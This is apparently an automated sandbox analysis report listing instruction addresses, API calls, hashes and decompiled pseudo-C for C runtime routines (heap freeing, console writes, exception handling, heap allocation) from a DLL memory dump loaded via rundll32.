                          0x6e24e520
                          0x6e24e522
                          0x6e24e524
                          0x6e24e527
                          0x6e24e640
                          0x6e24e645
                          0x6e24e52d
                          0x6e24e52d
                          0x6e24e52e
                          0x6e24e52e
                          0x6e24e531
                          0x6e24e534
                          0x6e24e536
                          0x6e24e539
                          0x6e24e539
                          0x6e24e53c
                          0x6e24e53e
                          0x6e24e541
                          0x6e24e546
                          0x6e24e554
                          0x6e24e55e
                          0x6e24e561
                          0x6e24e564
                          0x6e24e564
                          0x6e24e56f
                          0x6e24e574
                          0x6e24e579
                          0x00000000
                          0x6e24e57f
                          0x6e24e582
                          0x6e24e582
                          0x6e24e585
                          0x6e24e587
                          0x6e24e58a
                          0x6e24e58a
                          0x6e24e58a
                          0x6e24e58c
                          0x6e24e58c
                          0x6e24e58c
                          0x6e24e592
                          0x00000000
                          0x00000000
                          0x6e24e597
                          0x6e24e5ae
                          0x6e24e5ae
                          0x6e24e599
                          0x6e24e599
                          0x6e24e5a1
                          0x00000000
                          0x6e24e5a3
                          0x6e24e5a3
                          0x6e24e5a6
                          0x6e24e5ac
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e5ac
                          0x6e24e5a1
                          0x6e24e5b7
                          0x6e24e5bc
                          0x6e24e5be
                          0x6e24e5c3
                          0x6e24e5c6
                          0x6e24e5c9
                          0x6e24e5cc
                          0x6e24e5cf
                          0x6e24e5d1
                          0x6e24e5d6
                          0x6e24e5e0
                          0x6e24e5e8
                          0x6e24e5f0
                          0x00000000
                          0x6e24e5f6
                          0x6e24e5fa
                          0x6e24e647
                          0x6e24e64d
                          0x6e24e650
                          0x6e24e653
                          0x6e24e655
                          0x6e24e659
                          0x6e24e65d
                          0x6e24e65f
                          0x6e24e662
                          0x6e24e667
                          0x6e24e65d
                          0x6e24e668
                          0x6e24e66b
                          0x6e24e66d
                          0x6e24e66f
                          0x6e24e673
                          0x6e24e674
                          0x6e24e676
                          0x6e24e679
                          0x6e24e67e
                          0x6e24e674
                          0x6e24e681
                          0x6e24e684
                          0x6e24e687
                          0x6e24e68a
                          0x6e24e68d
                          0x6e24e68d
                          0x6e24e5fc
                          0x6e24e5fc
                          0x6e24e5ff
                          0x6e24e602
                          0x6e24e604
                          0x6e24e608
                          0x6e24e60c
                          0x6e24e60e
                          0x6e24e611
                          0x6e24e616
                          0x6e24e60c
                          0x6e24e617
                          0x6e24e61c
                          0x6e24e61e
                          0x6e24e623
                          0x6e24e625
                          0x6e24e628
                          0x6e24e62d
                          0x6e24e623
                          0x6e24e62e
                          0x6e24e632
                          0x6e24e632
                          0x6e24e635
                          0x6e24e639
                          0x6e24e63c
                          0x6e24e63c
                          0x00000000
                          0x6e24e63f
                          0x00000000
                          0x6e24e5f0
                          0x6e24e5b2
                          0x6e24e5b4
                          0x6e24e5b4
                          0x00000000
                          0x6e24e5b4
                          0x6e24e694
                          0x6e24e695
                          0x6e24e696
                          0x6e24e697
                          0x6e24e698
                          0x6e24e699
                          0x6e24e69e
                          0x6e24e6a1
                          0x6e24e6a2
                          0x6e24e6a4
                          0x6e24e6aa
                          0x6e24e6b1
                          0x6e24e6b4
                          0x6e24e6b7
                          0x6e24e6b8
                          0x6e24e6b9
                          0x6e24e6bc
                          0x6e24e6bd
                          0x6e24e6c0
                          0x6e24e6c6
                          0x6e24e6c8
                          0x6e24e6ed
                          0x6e24e6f7
                          0x6e24e6fd
                          0x6e24e6ff
                          0x6e24e705
                          0x6e24e707
                          0x6e24e95a
                          0x6e24e95b
                          0x00000000
                          0x6e24e70d
                          0x6e24e70d
                          0x6e24e711
                          0x6e24e878
                          0x6e24e88f
                          0x6e24e894
                          0x6e24e897
                          0x6e24e899
                          0x6e24e89f
                          0x6e24e89f
                          0x6e24e8a1
                          0x6e24e8a1
                          0x6e24e8a4
                          0x6e24e8a6
                          0x6e24e8ac
                          0x6e24e8ac
                          0x6e24e8ae
                          0x6e24e935
                          0x6e24e935
                          0x6e24e8b4
                          0x6e24e8b4
                          0x6e24e8b6
                          0x6e24e8bc
                          0x6e24e8bf
                          0x6e24e8c2
                          0x6e24e8c8
                          0x00000000
                          0x00000000
                          0x6e24e8ca
                          0x6e24e8ce
                          0x6e24e8f7
                          0x6e24e8f7
                          0x6e24e8f9
                          0x6e24e8d0
                          0x6e24e8d0
                          0x6e24e8d4
                          0x6e24e8d8
                          0x6e24e8df
                          0x6e24e8e5
                          0x00000000
                          0x6e24e8e7
                          0x6e24e8e7
                          0x6e24e8ea
                          0x6e24e8ed
                          0x6e24e8f5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e8f5
                          0x6e24e8e5
                          0x6e24e904
                          0x6e24e904
                          0x6e24e906
                          0x6e24e934
                          0x6e24e934
                          0x00000000
                          0x6e24e908
                          0x6e24e908
                          0x6e24e90e
                          0x6e24e90f
                          0x6e24e910
                          0x6e24e911
                          0x6e24e916
                          0x6e24e91c
                          0x6e24e91f
                          0x6e24e921
                          0x6e24e928
                          0x6e24e92a
                          0x6e24e92c
                          0x6e24e923
                          0x6e24e923
                          0x6e24e924
                          0x00000000
                          0x6e24e924
                          0x6e24e921
                          0x00000000
                          0x6e24e906
                          0x6e24e8fd
                          0x6e24e8ff
                          0x6e24e902
                          0x6e24e902
                          0x00000000
                          0x6e24e902
                          0x6e24e93b
                          0x6e24e93b
                          0x6e24e93c
                          0x6e24e93f
                          0x6e24e945
                          0x6e24e945
                          0x6e24e94e
                          0x6e24e950
                          0x00000000
                          0x6e24e952
                          0x6e24e952
                          0x00000000
                          0x6e24e952
                          0x6e24e950
                          0x00000000
                          0x6e24e717
                          0x6e24e717
                          0x6e24e71c
                          0x00000000
                          0x6e24e722
                          0x6e24e722
                          0x6e24e727
                          0x00000000
                          0x6e24e72d
                          0x6e24e72d
                          0x6e24e733
                          0x6e24e738
                          0x6e24e73a
                          0x6e24e741
                          0x6e24e742
                          0x6e24e744
                          0x00000000
                          0x00000000
                          0x6e24e74a
                          0x6e24e74a
                          0x6e24e74e
                          0x6e24e754
                          0x00000000
                          0x6e24e75a
                          0x6e24e75c
                          0x6e24e75d
                          0x6e24e760
                          0x00000000
                          0x6e24e766
                          0x6e24e766
                          0x6e24e76c
                          0x6e24e771
                          0x6e24e77b
                          0x6e24e77f
                          0x6e24e784
                          0x6e24e787
                          0x6e24e789
                          0x00000000
                          0x6e24e78b
                          0x6e24e78b
                          0x6e24e78d
                          0x6e24e790
                          0x6e24e790
                          0x6e24e793
                          0x6e24e796
                          0x6e24e796
                          0x6e24e7a1
                          0x6e24e7a3
                          0x6e24e7a5
                          0x00000000
                          0x00000000
                          0x6e24e7a5
                          0x00000000
                          0x6e24e7a7
                          0x6e24e7a7
                          0x6e24e7ad
                          0x6e24e7b0
                          0x6e24e7b0
                          0x6e24e7be
                          0x6e24e7c7
                          0x6e24e7cc
                          0x6e24e7d2
                          0x6e24e7d5
                          0x6e24e7d6
                          0x6e24e7d8
                          0x6e24e7e6
                          0x6e24e7e6
                          0x6e24e7ed
                          0x6e24e84e
                          0x00000000
                          0x6e24e7ef
                          0x6e24e7ef
                          0x6e24e7fd
                          0x6e24e802
                          0x6e24e805
                          0x6e24e807
                          0x6e24e977
                          0x6e24e979
                          0x6e24e97a
                          0x6e24e97b
                          0x6e24e97c
                          0x6e24e97d
                          0x6e24e97e
                          0x6e24e983
                          0x6e24e986
                          0x6e24e987
                          0x6e24e98f
                          0x6e24e996
                          0x6e24e999
                          0x6e24e99a
                          0x6e24e99d
                          0x6e24e9a1
                          0x6e24e9a2
                          0x6e24e9a5
                          0x6e24e9b5
                          0x6e24e9d8
                          0x6e24e9dd
                          0x6e24e9e0
                          0x6e24e9e2
                          0x6e24e9f7
                          0x6e24e9fa
                          0x6e24e9fa
                          0x6e24e9fd
                          0x6e24ea03
                          0x6e24ea09
                          0x6e24ea0c
                          0x6e24ea0e
                          0x6e24ea11
                          0x6e24ea18
                          0x6e24ea1b
                          0x6e24ea21
                          0x00000000
                          0x00000000
                          0x6e24ea23
                          0x6e24ea27
                          0x6e24ea50
                          0x6e24ea50
                          0x6e24ea29
                          0x6e24ea29
                          0x6e24ea2d
                          0x6e24ea31
                          0x6e24ea38
                          0x6e24ea3e
                          0x00000000
                          0x6e24ea40
                          0x6e24ea40
                          0x6e24ea43
                          0x6e24ea46
                          0x6e24ea4e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24ea4e
                          0x6e24ea3e
                          0x6e24ea5d
                          0x6e24ea5d
                          0x6e24ea5f
                          0x6e24ea65
                          0x6e24ea6b
                          0x6e24ea6e
                          0x6e24ea6e
                          0x6e24ea71
                          0x6e24ea74
                          0x6e24ea74
                          0x6e24ea84
                          0x6e24ea92
                          0x6e24ea97
                          0x6e24ea9e
                          0x6e24eaa0
                          0x00000000
                          0x6e24eaa6
                          0x6e24eaac
                          0x6e24eab2
                          0x6e24eab9
                          0x6e24eabf
                          0x6e24eac2
                          0x6e24eac8
                          0x6e24ead5
                          0x6e24eadc
                          0x6e24eae1
                          0x6e24eae4
                          0x6e24eae6
                          0x6e24ed3f
                          0x6e24ed45
                          0x6e24ed46
                          0x6e24ed47
                          0x6e24ed48
                          0x6e24ed49
                          0x6e24ed4a
                          0x6e24ed4f
                          0x6e24ed50
                          0x6e24ed5b
                          0x6e24ed63
                          0x6e24ed69
                          0x6e24ed6c
                          0x6e24ed71
                          0x6e24eaec
                          0x6e24eaec
                          0x6e24eafa
                          0x6e24eafd
                          0x6e24eb18
                          0x6e24eb1f
                          0x6e24eb25
                          0x6e24eb2b
                          0x6e24eaff
                          0x6e24eaff
                          0x6e24eb07
                          0x00000000
                          0x6e24eb09
                          0x6e24eb09
                          0x6e24eb0f
                          0x6e24eb0f
                          0x6e24eb07
                          0x6e24eb32
                          0x6e24eb35
                          0x6e24ec52
                          0x6e24ec55
                          0x6e24ec62
                          0x6e24ec65
                          0x6e24ec6d
                          0x6e24ec6d
                          0x6e24ec57
                          0x6e24ec5d
                          0x6e24ec5d
                          0x6e24eb3b
                          0x6e24eb3b
                          0x6e24eb41
                          0x6e24eb49
                          0x6e24eb4b
                          0x6e24eb4e
                          0x6e24eb57
                          0x6e24eb60
                          0x6e24eb66
                          0x6e24eb66
                          0x6e24eb69
                          0x6e24eb6b
                          0x00000000
                          0x00000000
                          0x6e24eb6d
                          0x6e24eb73
                          0x6e24eb74
                          0x6e24eb7f
                          0x6e24eb87
                          0x6e24eb8f
                          0x6e24eb92
                          0x6e24eb95
                          0x6e24eb9b
                          0x6e24eba1
                          0x6e24eba7
                          0x6e24ebad
                          0x6e24ebb0
                          0x00000000
                          0x00000000
                          0x6e24ebb2
                          0x6e24ebd7
                          0x6e24ebd7
                          0x6e24ebda
                          0x6e24ebde
                          0x6e24ebf7
                          0x6e24ebfc
                          0x6e24ebff
                          0x6e24ec01
                          0x6e24ec07
                          0x6e24ec42
                          0x6e24ec09
                          0x6e24ec09
                          0x6e24ec0e
                          0x6e24ec16
                          0x6e24ec17
                          0x6e24ec17
                          0x6e24ec2e
                          0x6e24ec35
                          0x6e24ec38
                          0x6e24ec3d
                          0x6e24ec3d
                          0x6e24ec45
                          0x6e24ec48
                          0x6e24ec48
                          0x6e24ec4d
                          0x00000000
                          0x6e24ec4d
                          0x6e24ebb4
                          0x6e24ebb6
                          0x6e24ebbb
                          0x6e24ebc1
                          0x6e24ebca
                          0x6e24ebd3
                          0x6e24ebd3
                          0x00000000
                          0x6e24ebb6
                          0x6e24ec70
                          0x6e24ec70
                          0x6e24ec74
                          0x6e24ec7c
                          0x6e24ec82
                          0x6e24ec85
                          0x6e24ec8b
                          0x6e24ec8d
                          0x6e24eccd
                          0x6e24ecd3
                          0x6e24ecda
                          0x6e24ecda
                          0x6e24ece0
                          0x6e24ece4
                          0x00000000
                          0x6e24ece6
                          0x6e24ece6
                          0x6e24ecea
                          0x6e24ecef
                          0x6e24ecf3
                          0x6e24ecf8
                          0x6e24ecff
                          0x6e24ed0d
                          0x6e24ed13
                          0x6e24ed16
                          0x6e24ed16
                          0x6e24ece4
                          0x6e24ed25
                          0x6e24ed2d
                          0x6e24ed36
                          0x6e24ec8f
                          0x6e24ec95
                          0x6e24ec98
                          0x6e24ec9f
                          0x6e24ecb1
                          0x6e24ecb8
                          0x6e24ecc5
                          0x00000000
                          0x6e24ecc5
                          0x00000000
                          0x6e24ec8d
                          0x6e24eae6
                          0x6e24ea61
                          0x00000000
                          0x6e24ea61
                          0x00000000
                          0x6e24ea5f
                          0x6e24ea58
                          0x6e24ea5a
                          0x6e24ea5a
                          0x00000000
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e6
                          0x6e24e9ea
                          0x6e24e9eb
                          0x6e24e9f6
                          0x6e24e9f6
                          0x6e24e80d
                          0x6e24e80d
                          0x6e24e810
                          0x6e24e815
                          0x6e24e972
                          0x00000000
                          0x6e24e81b
                          0x6e24e81d
                          0x6e24e825
                          0x6e24e82b
                          0x6e24e82c
                          0x6e24e832
                          0x6e24e833
                          0x6e24e838
                          0x6e24e83b
                          0x6e24e83d
                          0x6e24e843
                          0x6e24e845
                          0x6e24e846
                          0x6e24e846
                          0x6e24e854
                          0x6e24e854
                          0x6e24e857
                          0x6e24e859
                          0x6e24e85c
                          0x6e24e86a
                          0x6e24e86a
                          0x6e24e954
                          0x6e24e954
                          0x00000000
                          0x6e24e956
                          0x6e24e956
                          0x00000000
                          0x6e24e85e
                          0x6e24e85e
                          0x6e24e861
                          0x6e24e864
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e864
                          0x6e24e85c
                          0x6e24e815
                          0x6e24e807
                          0x6e24e7da
                          0x6e24e7dc
                          0x6e24e7dd
                          0x6e24e7e0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24e7e0
                          0x6e24e7d8
                          0x6e24e760
                          0x00000000
                          0x6e24e754
                          0x00000000
                          0x6e24e871
                          0x6e24e727
                          0x6e24e71c
                          0x6e24e711
                          0x6e24e6ca
                          0x6e24e6ca
                          0x6e24e6cc
                          0x6e24e6ce
                          0x6e24e6cf
                          0x6e24e6d0
                          0x6e24e6d1
                          0x6e24e6d6
                          0x6e24e961
                          0x6e24e965
                          0x6e24e966
                          0x6e24e971
                          0x6e24e971
                          0x6e24e6c8
                          0x00000000

                          APIs
                            • Part of subcall function 6E24F26D: HeapAlloc.KERNEL32(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          • _free.LIBCMT ref: 6E24E611
                          • _free.LIBCMT ref: 6E24E628
                          • _free.LIBCMT ref: 6E24E647
                          • _free.LIBCMT ref: 6E24E662
                          • _free.LIBCMT ref: 6E24E679
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$AllocHeap
                          • String ID: 'n
                          • API String ID: 1835388192-1397255199
                          • Opcode ID: a299ff0ecc653a6593bd7b1ddde8430d472eeaa847eb607e6a60087f807d9e53
                          • Instruction ID: 0a893c57c1a0448593334c79b178121568037943c929681ed19f1f765fe0ec54
                          • Opcode Fuzzy Hash: a299ff0ecc653a6593bd7b1ddde8430d472eeaa847eb607e6a60087f807d9e53
                          • Instruction Fuzzy Hash: 5951D475A1030DEFEB59CFA9C841AAAB3FAEF45725F100569E809DF250EB35E900CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E252C2B, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E252C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2c76f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2c76f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E24367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E24CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E24CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E21F8A5(_v8 ^ _t133, _t129, _t132);
			}



































                          0x6e252c33
                          0x6e252c3a
                          0x6e252c3d
                          0x6e252c45
                          0x6e252c49
                          0x6e252c55
                          0x6e252c58
                          0x6e252c5b
                          0x6e252c62
                          0x6e252c6a
                          0x6e252c6d
                          0x6e252c73
                          0x6e252c79
                          0x6e252c7e
                          0x6e252c80
                          0x6e252c83
                          0x6e252c88
                          0x6e252c92
                          0x6e252c99
                          0x6e252c9c
                          0x6e252ca3
                          0x6e252caa
                          0x6e252cc5
                          0x6e252ccd
                          0x6e252cd6
                          0x6e252cfc
                          0x6e252cfe
                          0x00000000
                          0x6e252cd8
                          0x6e252cdb
                          0x6e252da2
                          0x6e252dae
                          0x6e252db9
                          0x6e252dbe
                          0x6e252ce1
                          0x6e252ce8
                          0x6e252ced
                          0x6e252cf3
                          0x6e252cf9
                          0x00000000
                          0x6e252cf9
                          0x6e252cf3
                          0x6e252cdb
                          0x6e252cac
                          0x6e252cb0
                          0x6e252cb3
                          0x6e252cb9
                          0x6e252cbb
                          0x6e252cbe
                          0x6e252cc2
                          0x6e252cff
                          0x6e252d02
                          0x6e252d03
                          0x6e252d08
                          0x6e252d0e
                          0x6e252d14
                          0x6e252d23
                          0x6e252d29
                          0x6e252d2f
                          0x6e252d34
                          0x6e252d50
                          0x6e252dc3
                          0x6e252dc9
                          0x6e252d52
                          0x6e252d5a
                          0x6e252d63
                          0x6e252d69
                          0x00000000
                          0x6e252d6b
                          0x6e252d6d
                          0x6e252d70
                          0x6e252d89
                          0x00000000
                          0x6e252d8b
                          0x6e252d8f
                          0x6e252d91
                          0x6e252d94
                          0x00000000
                          0x6e252d94
                          0x6e252d8f
                          0x6e252d89
                          0x6e252d69
                          0x6e252d63
                          0x6e252d50
                          0x6e252d34
                          0x6e252d0e
                          0x00000000
                          0x6e252d97
                          0x6e252d97
                          0x6e252dcb
                          0x6e252ddd

                          APIs
                          • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2533A0,?,?,00000000,?,?,?), ref: 6E252C6D
                          • __fassign.LIBCMT ref: 6E252CE8
                          • __fassign.LIBCMT ref: 6E252D03
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E252D29
                          • WriteFile.KERNEL32(?,00000000,00000000,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D48
                          • WriteFile.KERNEL32(?,?,00000001,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D81
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
                          • Instruction ID: d6a1b6dbef85d15a2449a7ad8e6a947c604b614d6ee9e06ed70c267ba889a7c5
                          • Opcode Fuzzy Hash: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
                          • Instruction Fuzzy Hash: A451A4B290064A9FDB00CFA8C985AEEBBFAEF0A300F15455AE955F7381D730D951CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E223F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6E223F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e2c506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E223F20(_t74, __edx);
				E6E225267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E225920(_t74, 0xfffffffe, _t93, 0x6e2c506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E2258D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E223F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e26e698;
											if(__eflags != 0) {
												_t70 = E6E267400(__eflags, 0x6e26e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e26e698; // 0x6e223b1a
													 *0x6e26a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E225904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E225920(_t63, _t90, _t93, 0x6e2c506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E223F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E2258E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E242281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = HeapAlloc( *0x6e2c7b04, 0, _t95);
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E25BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E249256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}




































                          0x6e223f60
                          0x6e223f66
                          0x6e223f67
                          0x6e223f6b
                          0x6e223f6c
                          0x6e223f73
                          0x6e223f76
                          0x6e223f7c
                          0x6e223f7d
                          0x6e223f7e
                          0x6e223f85
                          0x6e223f88
                          0x6e223f8b
                          0x6e223f93
                          0x6e223f98
                          0x6e223f9b
                          0x6e223f9e
                          0x6e223fa5
                          0x6e224006
                          0x6e224009
                          0x6e224011
                          0x6e224018
                          0x00000000
                          0x6e224018
                          0x00000000
                          0x6e223fa7
                          0x6e223fa7
                          0x6e223fad
                          0x6e223fb3
                          0x6e223fb9
                          0x6e224029
                          0x6e224032
                          0x6e223fbb
                          0x6e223fc0
                          0x6e223fc0
                          0x6e223fc3
                          0x6e223fc6
                          0x6e223fc9
                          0x6e223fcc
                          0x6e223fcf
                          0x6e223fd2
                          0x6e223fd7
                          0x6e223fed
                          0x00000000
                          0x6e223fd9
                          0x6e223fd9
                          0x6e223fdb
                          0x6e223fe0
                          0x6e223fe2
                          0x6e223fe5
                          0x6e223fe7
                          0x6e223ffd
                          0x6e22401d
                          0x6e22401d
                          0x6e22401e
                          0x6e224021
                          0x00000000
                          0x6e223fe9
